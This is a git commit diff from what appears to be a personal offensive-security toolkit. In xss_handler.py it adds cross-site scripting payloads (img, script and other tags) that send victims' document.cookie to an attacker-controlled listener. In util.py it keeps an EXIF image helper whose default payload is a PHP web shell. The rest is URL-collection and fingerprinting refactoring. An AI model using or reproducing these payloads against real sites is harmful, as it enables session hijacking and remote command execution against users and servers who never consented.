Browse Source

Some more XSS payloads

Roman Hergenreder 3 years ago
parent
commit
a086ddeb42
3 changed files with 65 additions and 20 deletions
  1. 40 0
      util.py
  2. 4 16
      web_service_finder.py
  3. 21 4
      xss_handler.py

+ 40 - 0
util.py

@@ -1,9 +1,14 @@
+#!/usr/bin/env python
+
 import random
 import socket
 import netifaces as ni
+import requests
 import sys
 import exif
 import PIL
+import os
+from bs4 import BeautifulSoup
 
 def getAddress(interface="tun0"):
     if not interface in ni.interfaces():
@@ -135,6 +140,22 @@ def exifImage(payload="<?php system($_GET['c']);?>", _in=None, _out=None, exif_t
     else:
         print("Invalid output argument.")
 
+def collectUrls(input):
+    if not isinstance(input, BeautifulSoup):
+        input = BeautifulSoup(input, "html.parser")
+
+    urls = set()
+    attrs = ["src","href"]
+    tags = ["a","link","script","img"]
+
+    for tag in tags:
+        for e in input.find_all(tag):
+            for attr in attrs:
+                if e.has_attr(attr):
+                    urls.add(e[attr])
+
+    return urls
+
 if __name__ == "__main__":
     bin = sys.argv[0]
     if len(sys.argv) < 2:
@@ -172,3 +193,22 @@ if __name__ == "__main__":
                 _out = ".".join(_out[0:-1]) + "_exif." + _out[-1]
 
             exifImage(payload, _in, _out, tag)
+    elif command == "collectUrls":
+        if len(sys.argv) < 3:
+            print("Usage: %s collectUrls <url/file>" % bin)
+        else:
+            uri = sys.argv[2]
+            if os.path.isfile(uri):
+                data = open(uri,"r").read()
+            else:
+                res = requests.get(uri)
+                if res.status_code != 200:
+                    print("%s returned: %d %s" % (uri, res.status_code, res.reason))
+                    exit()
+                data = res.text
+            for item in sorted(collectUrls(data)):
+                print(item)
+    elif command == "help":
+        print("Usage: %s [command]" % bin)
+        print("Available commands:")
+        print("   help, getAddress, pad, collectUrls, exifImage")

+ 4 - 16
web_service_finder.py

@@ -5,6 +5,7 @@ import sys
 import argparse
 import requests
 import urllib.parse
+from hackingscripts import util
 from bs4 import BeautifulSoup
 
 class WebServicecFinder:
@@ -108,19 +109,6 @@ class WebServicecFinder:
             return True
         return False
 
-    def collectUrls(self, soup):
-        urls = set()
-        attrs = ["src","href"]
-        tags = ["a","link","script","img"]
-
-        for tag in tags:
-            for e in soup.find_all(tag):
-                for attr in attrs:
-                    if e.has_attr(attr):
-                        urls.add(e[attr])
-
-        return urls
-
     def retrieveMoodleVersion(self, v):
         res = requests.get("https://docs.moodle.org/dev/Releases")
         soup = BeautifulSoup(res.text, "html.parser")
@@ -158,9 +146,9 @@ class WebServicecFinder:
         moodle_pattern_1 = re.compile(r"^https://download.moodle.org/mobile\?version=(\d+)(&|$)")
         moodle_pattern_2 = re.compile(r"^https://docs.moodle.org/(\d+)/")
         litecart_pattern = re.compile(r"^https://www.litecart.net")
-        wordpress_pattern = re.compile(r"/wp-(admin|includes|content)/(([^/]+)/)*(wp-emoji-release.min.js|block-library/style.min.css)\?ver=([0-9.]+)(&|$)")
+        wordpress_pattern = re.compile(r"/wp-(admin|includes|content)/(([^/]+)/)*(wp-emoji-release.min.js|style.min.css)\?ver=([0-9.]+)(&|$)")
 
-        urls = self.collectUrls(soup)
+        urls = util.collectUrls(soup)
         for url in urls:
             self.printMatch("Moodle", moodle_pattern_1.search(url), version_func=lambda v: self.retrieveMoodleVersion(int(v)))
             self.printMatch("Moodle", moodle_pattern_2.search(url), version_func=lambda v: "%d.%d" % (int(v)//10,int(v)%10))
@@ -170,7 +158,7 @@ class WebServicecFinder:
 
     def analyseRobots(self):
         res = self.do_get("/robots.txt", allow_redirects=False)
-        if res.status_code in (301,302,404,403):
+        if res.status_code != 200:
             print("[-] robots.txt not found or inaccessible")
             return False
 

+ 21 - 4
xss_handler.py

@@ -6,12 +6,29 @@ import http.server
 import socketserver
 from http.server import HTTPServer, BaseHTTPRequestHandler
 
-def generatePayload(type, address, port):
-    if type == "img":
-        return '<img src="#" onerror="javascript:document.location=\'http://%s:%d/?x=\'+document.cookie">' % (address, port)
+def getCookieAddress(address, port):
+    if port == 80:
+        return "'http://%s/?x='+document.cookie" % address
     else:
+        return "'http://%s:%d/?x='+document.cookie" % (address, port)
+
+def generatePayload(type, address, port):
+
+    payloads = []
+    cookieAddress = getCookieAddress(address, port)
+
+    media_tags = ["img","audio","video","image","body","script","object"]
+    if type in media_tags:
+        payloads.append('<%s src=1 href=1 onerror="javascript:document.location=%s">' % (type, cookieAddress))
+
+    if type == "script":
+        payloads.append('<script type="text/javascript">document.location=%s</script>' % cookieAddress)
+
+    if len(payloads) == 0:
         return None
 
+    return "\n".join(payloads)
+
 class XssServer(BaseHTTPRequestHandler):
     def _set_headers(self):
         self.send_response(200)
@@ -54,7 +71,7 @@ if __name__ == "__main__":
 
     payload = generatePayload(payload_type, local_address, listen_port)
     if not payload:
-        print("Unsupported payload type, choose one of: img")
+        print("Unsupported payload type")
         exit(1)
 
     print("Payload:")